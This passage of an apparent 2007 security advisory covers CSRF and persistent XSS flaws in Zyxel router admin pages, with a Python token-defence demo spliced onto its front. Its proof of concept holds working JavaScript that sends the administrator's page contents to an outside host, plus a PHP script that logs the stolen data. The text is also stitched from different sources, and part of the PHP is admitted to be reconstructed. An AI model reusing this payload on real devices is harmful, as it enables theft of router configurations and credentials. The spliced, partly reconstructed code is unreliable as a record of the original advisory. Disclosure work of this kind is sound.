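FORGED_NO_TOKEN = (
    {"Origin": "http://192.168.1.1"},  # even if the origin check were bypassed,
    {"dns1": "1.1.1.1"},               # the attacker cannot know the session's token
)

if __name__ == "__main__":
    for hdrs, form in (LEGIT_REQUEST, FORGED_REQUEST, FORGED_NO_TOKEN):
        print(handle_config_post(VICTIM_SESSION, hdrs, form))
```

   The token is the essential control: browsers of the period did not
   send an Origin header at all and Referer can be suppressed, which is
   why the origin check is a second layer rather than the defence. Tying
   the token to the session also covers the Buffalo case, where HTTP
   Basic credentials are replayed automatically by the browser, and
   the Zyxel/A-Link case of a victim who never logs out.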

Solution:

  Include a random user-specific token in forms.

Proof of Concept:

  Example form (exploits persistent XSS):

  http://192.168.1.1/Forms/General_1">
  http://nx.fi/X'>"

X:
- --
document.write("Security Updates - http://www.zyxel.com");

// Once the administrator's browser has rendered the management page,
// send its HTML to the attacker's host in 4096-byte chunks, each one
// as the query string of an image request.
function getPage(){
var i = 0;
var data = encodeURIComponent(document.body.innerHTML);

while (i < data.length)
{
var tmp = data.substr(i, 4096);
(new Image()).src = "http://nx.fi/xss/getinfo.php?page=" + tmp;
i += 4096;
}

}

setTimeout("getPage()", 1000);
- --

getinfo.php:
- --
<?php
// Receiving end: append every request parameter of each chunk to
// log.html. The opening lines of the script were lost in extraction;
// the guard and the HTML markers around each entry are reconstructed.
if (count($_REQUEST) > 0) {
$data = "<p>";
foreach($_REQUEST as $tmp) {
$data .= htmlspecialchars(urldecode($tmp));
}

$data .= "</p>\n";

$myfile = "log.html";
$handle = fopen($myfile, 'a');
fwrite($handle, $data);
fclose($handle);

}

?>
- --

Notice that the 'system name' variable is limited in length, so you'll
need a relatively short URL.

Workaround:

Change administration password and default IP address.
Perform administration using SSH.


Disclosure Timeline:

  May  10   2007- Contacted Zyxel by email
  May  11   2007- Vendor responded by email
  June  7   2007- Vendor stated that this not an urgent issue
  June 28   2007- Provided vendor with a proof-of-concept attack
  August 10 2007- Advisory released


Copyright 2007 Louhi Networks Oy. All rights reserved.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (MingW32)

iEYEAREIAAYFAka8P3UACgkQ3TZNEGeZkm5eGACffzkmceMKroY4VTKxPX/ec5eH
0AsAn1uIxklFttYYlviEOJ42EXP0yTH1
=06kW
-END PGP SIGNATURE-